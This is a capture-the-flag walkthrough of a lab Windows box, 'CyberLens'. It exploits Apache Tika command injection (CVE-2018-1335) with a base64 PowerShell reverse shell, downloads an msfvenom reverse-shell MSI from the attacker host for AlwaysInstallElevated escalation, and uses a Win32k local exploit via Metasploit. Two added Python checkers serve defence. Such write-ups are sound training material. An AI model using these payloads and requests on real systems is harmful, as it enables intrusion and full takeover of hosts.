
CyberLens

Can you exploit the CyberLens web server and discover the hidden flags?


This work by Manav G Krishna is licensed under CC BY-NC 4.0

Machine IP: 10.10.131.149

Nmap Scan:

nmap -p- -v 10.10.131.149 --min-rate 100 -oN cyberlens_thm -Pn 

Nmap scan report for cyberlens.thm (10.10.131.149)
Host is up (0.15s latency).
Not shown: 65518 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-05-18T05:18:41+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Issuer: commonName=CyberLens
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-05-17T05:04:27
| Not valid after:  2024-11-16T05:04:27
| MD5:   0a8f:0621:514f:c425:d6c1:c704:82bf:3dbb
|_SHA-1: 9cc8:94c9:73db:50dc:215f:e168:4e54:f1d9:9554:9106
| rdp-ntlm-info: 
|   Target_Name: CYBERLENS
|   NetBIOS_Domain_Name: CYBERLENS
|   NetBIOS_Computer_Name: CYBERLENS
|   DNS_Domain_Name: CyberLens
|   DNS_Computer_Name: CyberLens
|   Product_Version: 10.0.17763
|_  System_Time: 2024-05-18T05:18:33+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp  open  pando-pub?
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49677/tcp open  msrpc         Microsoft Windows RPC
61777/tcp open  http          Jetty 8.y.z-SNAPSHOT
| http-methods: 
|   Supported Methods: POST GET PUT OPTIONS HEAD
|_  Potentially risky methods: PUT
|_http-title: Welcome to the Apache Tika 1.17 Server
|_http-cors: HEAD GET
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).

Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-05-18T05:18:36
|_  start_date: N/A

TRACEROUTE (using port 199/tcp)
HOP RTT       ADDRESS
1   148.60 ms 10.11.0.1
2   149.53 ms cyberlens.thm (10.10.131.149)

Let us add cyberlens.thm to the hosts file as mentioned in the description of the room.

Command:

echo '10.10.131.149 cyberlens.thm' | sudo tee -a /etc/hosts

Instead of waiting for the scan to complete fully, we can navigate to the website on port 80. Because the Nmap command uses the verbose switch (-v), open ports are printed as soon as they are found.

Checking out Port 80:

We can see what Wappalyzer tells us:

The web server running is Apache 2.4.57.

We have a contact form here:

Testing out a basic XSS Payload:

Now let's set up a netcat listener on port 80. If the above payload works, we should get a connection back on the listener, which would show that the server reached out to our machine. The IP specified in the payload is the tun0 interface IP.

But unfortunately we don't get any connection on the listener.

Nothing out of the ordinary was found while directory busting, and VHOST busting yielded no results.

There is a feature on the site called CyberLens Image Extractor:

Basically we can upload files and the feature fetches the metadata present within those files. Metadata is the hidden data that accompanies every image, video, and file you encounter.

Checking out this feature by intercepting the request in BurpSuite:

After turning on intercept in Burp, we just have to upload a file and click on the Get Metadata button, and the request will get captured in Burp:

Forward the above request and we will be on the one that we need:

This shows that the metadata extraction takes place on port 61777. We can now check out the Nmap scan, which should have completed by now, and also the website on that port:

We can see that it is using Apache Tika 1.17. It is an open-source software library that detects and extracts metadata and structured text from a variety of file formats. This is what is being used to fetch the metadata from the files that we upload in the CyberLens Image Extractor feature.

We can confirm this by looking at the metadata it extracts, mainly the parsing headers; a PDF file was uploaded this time:

The endpoint, as seen in the request, is /meta: this is where the request goes after clicking Get Metadata, and the data is sent to the server with a PUT:

Now that we know exactly what is happening, we can search for exploits for Apache Tika 1.17, which leads us to CVE-2018-1335.

CVE-2018-1335 - Command Injection in Apache Tika:

CVE-2018-1335

Note:

I will be showing three ways to get a foothold by exploiting the above-mentioned CVE: first manually, second via the POC (Python script), and finally via Metasploit.

Manual Exploitation to get a Reverse Shell:

Towards the end of the above attached blog, we find this:

Based on this, we have to include a few headers, change the Content-Type and add the JS code in the body of the request.

var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c calc.exe');

What these two JS lines do: the first creates a WScript.Shell object, which exposes Windows shell functionality (WScript is the Windows Script Host, which interprets and executes scripts written in languages such as VBScript and JScript); the second uses that object to run the command cmd /c calc.exe, which opens Calculator on the target machine.

We can modify the command to get a reverse shell instead.

Base64 Encoded PS Reverse Shell:

Setting up a listener on port 445:

Final Request:

The extra headers include:

X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:Jscript

The Content-Type also has to be changed to image/jp2. This is the whole bug: tika-server 1.7 through 1.17 builds the Tesseract OCR command line from these client-supplied headers, so an image upload makes the server run cscript with the request body as JScript instead of running Tesseract on it. The issue is fixed in Tika 1.18.

The request body:

var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAxAC4ANwA1AC4AOAA0ACIALAA0ADQANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=');
PUT /meta HTTP/1.1
Host: cyberlens.thm:61777
Content-Type: image/jp2
X-Tika-OCRTesseractPath: "cscript"
X-Tika-OCRLanguage: //E:Jscript

var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('cmd /c powershell -e <base64-encoded PS reverse shell from above>');

The same can be done through curl too:

Command:

curl -X PUT http://cyberlens.thm:61777/meta \
     -H "Content-Type: image/jp2" \
     -H 'X-Tika-OCRTesseractPath: "cscript"' \
     -H 'X-Tika-OCRLanguage: //E:Jscript' \
     --data '
var oShell = WScript.CreateObject("WScript.Shell");
var oExec = oShell.Exec('\''cmd /c powershell -e <base64-encoded PS reverse shell from above>'\'');
'

We just send the request and check the listener:

We now have a shell as the user cyberlens and can get the user flag from this user's Desktop folder.
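From the defender's side, the request above is exactly what a reverse proxy in front of tika-server should refuse. The following check is an added example (not code from the room or from Apache Tika) with a hypothetical inspect_tika_request function: it flags any client-supplied X-Tika-OCR* header, explains why the values look malformed, and notes when a PUT of an image would route the body into the OCR parser.

```python
import re

# Request headers that tika-server 1.7 to 1.17 copied into the Tesseract OCR
# process configuration; this is the injection surface of CVE-2018-1335.
OCR_HEADER_PREFIX = "x-tika-ocr"
# Tesseract language tags: three lowercase letters, optional script suffix,
# several may be joined with '+', e.g. "eng", "eng+deu", "chi_sim".
LANG_RE = re.compile(r"^[a-z]{3}(?:_[a-z]+)?(?:\+[a-z]{3}(?:_[a-z]+)?)*$")
# Tesseract binary directory: absolute path, no quotes or shell metacharacters.
PATH_RE = re.compile(r"^(?:[A-Za-z]:\\|/)[\w\\/.\- ]*$")


def inspect_tika_request(method: str, path: str, headers: dict) -> dict:
    """Inspect one request destined for tika-server (hypothetical helper).

    Returns {"block": bool, "findings": [str, ...]}. Any X-Tika-OCR* header
    from an untrusted client is a finding, because a hardened deployment never
    lets clients choose OCR settings; malformed values are reported separately
    so the proxy log explains why the request looked like an injection attempt.
    """
    findings = []
    lower = {k.lower(): v for k, v in headers.items()}
    ocr_overrides = {k: v for k, v in lower.items() if k.startswith(OCR_HEADER_PREFIX)}
    for name, value in ocr_overrides.items():
        findings.append(f"client-controlled OCR setting {name}={value!r}")
    tpath = ocr_overrides.get("x-tika-ocrtesseractpath")
    if tpath is not None and not PATH_RE.match(tpath):
        findings.append("TesseractPath is not a plain absolute directory")
    lang = ocr_overrides.get("x-tika-ocrlanguage")
    if lang is not None and not LANG_RE.match(lang):
        findings.append("OCRLanguage is not a Tesseract language tag")
    ctype = lower.get("content-type", "")
    if ocr_overrides and method.upper() == "PUT" and ctype.startswith("image/"):
        findings.append(f"{method} {path} as {ctype} routes the body to the OCR parser")
    return {"block": bool(ocr_overrides), "findings": findings}


if __name__ == "__main__":
    # Headers taken from the request shown above in this write-up.
    verdict = inspect_tika_request("PUT", "/meta", {
        "Host": "cyberlens.thm:61777",
        "Content-Type": "image/jp2",
        "X-Tika-OCRTesseractPath": '"cscript"',
        "X-Tika-OCRLanguage": "//E:Jscript",
    })
    for line in verdict["findings"]:
        print("-", line)
    print("block:", verdict["block"])
```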

Using POC to get a Reverse Shell:

Command:

python3 exploit.py cyberlens.thm 61777 'cmd /c powershell -e <base64-encoded PS reverse shell from above>'

The Base64-encoded PS payload is used here too.

We have now got the shell:

Using Metasploit:

Command:

msfconsole -q  # starts Metasploit in quiet mode, i.e. without printing the banner

Setting the options:

Running systeminfo from the shell obtained by any of the above ways gives us the system type:

Command:

systeminfo | findstr /B /C:"System Type"

It is a 64-bit machine, so we have to set a 64-bit payload in the payload option.

Now we just run the exploit:

Yet again, we have a shell.

Let us do some enumeration and find out whether any users' passwords are stored in files, which is fairly common in real-world pentests too. Let us check a few common file types that passwords could be stored in, such as .txt, .xml and .ini.

We can first look within CyberLens's home folder.

Command:

Get-ChildItem -Path . -Recurse -Include *.txt,*.xml,*.ini

There is a file called CyberLens-Management.txt.

Let us check it out:

And indeed we find CyberLens's password.

The Nmap scan also shows that port 3389 is open. Let us confirm whether we can RDP in as CyberLens:

Command:

netexec rdp cyberlens.thm -u CyberLens -p 'insert_password'

NetExec reports Pwn3d!, which means the creds are valid and we can RDP in.

Note:

RDPing in is not needed as we already have a shell as CyberLens. Below are the steps to follow if you want to try it out.

Command:

xfreerdp /u:CyberLens /p:'insert_password' /v:cyberlens.thm /dynamic-resolution

We have got in.

Privilege Escalation to SYSTEM (Intended Way):

We can firstly check if Windows Defender is running or not:

Command:

sc.exe query WinDefend

We can see that the STATE is STOPPED, which means Defender is not running.

Now let us run WinPEAS on the machine by serving it via a Python web server; a 64-bit WinPEAS is what we need as the target system is 64-bit.

We can write to the home folder or Desktop folder of the user CyberLens, as we have Full Control (F) on these locations:

Command:

IWR -Uri http://10.11.75.84:4545/winPEASx64.exe -OutFile winPEASx64.exe

Running WinPEAS:

We then come across this:

We can see that the AlwaysInstallElevated policy is set to 1 (Enabled) in both the HKLM (HKEY_LOCAL_MACHINE) and HKCU (HKEY_CURRENT_USER) registry hives. This policy lets non-administrative users install MSI packages with elevated (SYSTEM) privileges, and Windows Installer only honours it when it is enabled in both hives, which is the case here: globally (for all users) as well as for the current user.

Manually enumerating the status of AlwaysInstallElevated:

Commands:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
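A defender auditing many hosts wants this check scripted with the both-hives rule applied correctly. The following is an added example (not from the room) with a hypothetical always_install_elevated_status function that parses the output of the two reg query commands above; the sample outputs are constructed to mirror that command's format, including the ERROR line reg prints when the value is absent.

```python
import re

# Value line printed by `reg query ... /v AlwaysInstallElevated`, e.g.
#     AlwaysInstallElevated    REG_DWORD    0x1
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9a-fA-F]+)\s*$", re.M)


def parse_reg_query(output: str):
    """Return the DWORD value as an int, or None when the value is absent
    (reg query then prints an ERROR line instead of a value line)."""
    m = VALUE_RE.search(output)
    return int(m.group(1), 16) if m else None


def always_install_elevated_status(hklm_output: str, hkcu_output: str) -> dict:
    """Evaluate both hives (hypothetical helper). Windows Installer only
    applies the policy when it is 1 in HKLM *and* HKCU; a missing value
    behaves like 0, so a single enabled hive is a finding but not exploitable."""
    hklm = parse_reg_query(hklm_output)
    hkcu = parse_reg_query(hkcu_output)
    return {
        "HKLM": hklm,
        "HKCU": hkcu,
        "exploitable": hklm == 1 and hkcu == 1,
        "remediation": "set AlwaysInstallElevated to 0 (or delete it) in both hives",
    }


# Constructed sample outputs in the format of `reg query`.
SAMPLE_HKLM_ENABLED = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
SAMPLE_HKCU_ENABLED = SAMPLE_HKLM_ENABLED.replace("HKEY_LOCAL_MACHINE", "HKEY_CURRENT_USER")
SAMPLE_HKCU_MISSING = "ERROR: The system was unable to find the specified registry key or value."

if __name__ == "__main__":
    print(always_install_elevated_status(SAMPLE_HKLM_ENABLED, SAMPLE_HKCU_ENABLED))
    print(always_install_elevated_status(SAMPLE_HKLM_ENABLED, SAMPLE_HKCU_MISSING))
```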

We can abuse this to escalate privileges to SYSTEM by crafting a malicious MSI file.

We can create an .msi payload using msfvenom and serve it via a Python web server.

Command:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.75.84 LPORT=443 -a x64 --platform windows -f msi -o evil.msi

Command:

IWR -Uri http://10.11.75.84:4545/evil.msi -OutFile evil.msi

Now let us set up a listener on port 443:

Running the bad MSI file:

Command:

msiexec.exe /i evil.msi

Now let us check out our listener:

We have successfully got a shell as SYSTEM. The admin flag can be found in the Desktop folder of Administrator.

The same can be done via Metasploit too (exploit/windows/local/always_install_elevated).

Privilege Escalation to SYSTEM (Unintended Way):

Let us check out the OS Version on the machine:

Command:

systeminfo | findstr /B /C:"OS Version"

It is 10.0.17763 N/A Build 17763. We can now look for exploits for this version:

And we get this in one of the results:

It is an LPE (Local Privilege Escalation) exploit.

CVE-2021-40449 (Win32k - LPE):

CVE-2021-40449

We can check out the repo:

We can see that the exact version that we have on the target is vulnerable to this LPE exploit.

This can be used to get to SYSTEM.

The repo doesn't have pre-compiled binaries: the .sln file has to be compiled into an .exe, which can be done with Visual Studio. There are other ways to do it, but it is a lengthy procedure. Instead, we can exploit this more easily using Metasploit.

Note:

We can use the meterpreter shell obtained earlier by exploiting the Apache Tika CVE to run the above-mentioned LPE exploit, or we can use the web_delivery module from the shell obtained by manually exploiting the Tika CVE. The easier and more practical way of getting a meterpreter shell would be web_delivery. But since we already have a meterpreter shell from before, I will be using that, as it is a shell obtained in the context of this machine, and mainly because you then have the option to choose which way you would like to follow to get to SYSTEM. Also, a couple of repos containing a pre-built binary for the LPE exploit were found, but they didn't work.

Getting the shell as CyberLens by exploiting CVE-2018-1335:

CVE-2021-40449 Exploitation:

The initial meterpreter shell is backgrounded (bg) so that it can be used with the exploit.

Setting the options:

We first have to set SESSION, which is basically the initial shell that we obtained. This is how the exploit module knows which session to perform the LPE on.

Note:

The SESSION number is 3 for me as this is the 3rd session I have opened. It won't be the same in your case; it depends on how many sessions were opened before using the Apache Tika Metasploit exploit. Make sure to run the meterpreter command sessions to find out your current session ID.

We left LPORT at the default of 4444 while performing the Tika exploit via Metasploit. Now we have to use a different LPORT for the exploit to listen on, so we can set it to 5555.

Now we just run the exploit:

We are SYSTEM again.

We could also find the LPE exploit more simply from the meterpreter shell itself by using Metasploit's Local Exploit Suggester (Lester):

This module scans the system and lists possible vulnerabilities.

Command:

run post/multi/recon/local_exploit_suggester

Note:

All exploits mentioned by the suggester were tried, but the only one that worked was CVE-2021-40449. There are also multiple post-exploitation recon tools like Lester that yield the same result as shown above.

Room solved!!
